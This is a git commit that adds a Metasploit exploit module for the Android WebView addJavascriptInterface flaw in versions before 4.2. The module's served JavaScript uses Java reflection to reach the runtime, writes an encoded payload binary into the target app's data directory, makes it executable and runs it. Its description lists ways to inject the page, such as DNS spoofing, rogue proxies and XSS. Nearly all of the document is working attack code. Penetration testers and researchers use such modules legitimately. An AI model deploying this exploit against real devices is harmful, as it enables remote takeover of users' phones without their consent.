Add webview HTTP exploit.

2014-02-04 01:37:09 -06:00
parent e50077844c
commit 177bd35552
1 changed files with 93 additions and 0 deletions
@@ -0,0 +1,93 @@
+# ./sdk/tools/android and install Android 4.1.2 or below
+# 
+
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+# require 'rex/proto/proxy/http'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Android < 4.2 WebView addJavascriptInterface MITM Code Execution',
+      'Description' => %q{
+            This module exploits an issue where MITM attackers can execute 
+          arbitrary code on vulnerable Android devices. The issue is rooted in
+          the use of the addJavascriptInterface function, which exposes Java
+          Reflection to Javascript executing within a WebView instance. Many
+          Android ad networks are known to be affected.
+
+          To use this module, the attacker must have some way to inject the html/js
+          served by metasploit into an affected Webview on the target device. There
+          are a number of ways to do this (DNS spoofing, rogue HTTP proxy, XSS injection, etc).
+
+          Note: Adding a .js to the URL will return plain javascript (no HTML markup).
+      },
+      'License'     => MSF_LICENSE,
+      'Author'      => [
+        'jduck', # original msf module
+        'joev'   # static server
+      ],
+      'References'     => [
+        ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
+        ['URL', 'http://50.56.33.56/blog/?p=314'],
+        ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-'+
+                'addjavascriptinterface-remote-code-execution/']
+      ],
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_ARMLE,
+      'DefaultOptions' => { 'PrependFork' => true },
+      'Targets'        => [ [ 'Automatic', {} ] ],
+      'DisclosureDate' => 'Dec 21 2012',
+      'DefaultTarget'  => 0
+    ))
+  end
+
+  def on_request_uri(cli, req)
+    if req.uri.end_with?('js')
+      print_status("Serving javascript")
+      send_response(cli, js, 'Content-type' => 'text/javascript')
+    else
+      print_status("Serving HTML")
+      send_response_html(cli, html)
+    end
+  end
+
+  def js
+    %Q|
+      function exec(obj,i) {
+        // ensure that the object contains a native interface
+        try { obj.getClass().getName(); } catch(e) { return false; }
+
+        // get the runtime so we can exec
+        var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
+        var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
+        
+        // get the process name, which will give us our data path
+        var p = m.invoke(null,null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
+        var ch, path = '/data/data/';
+        while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
+        path += '/#{Rex::Text.rand_text_alpha(8)}';
+
+        // build the binary, chmod it, and execute it
+        m.invoke(null,null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
+        m.invoke(null,null).exec(['chmod', '700', path]).waitFor();
+        m.invoke(null,null).exec([path]).waitFor();
+
+        return true;
+      }
+
+      for (i in window) { if (exec(window[i],i) === true) break; }
+    |
+  end
+
+  def html
+    "<!doctype html><html><body><script>#{js}</script></body></html>"
+  end
+end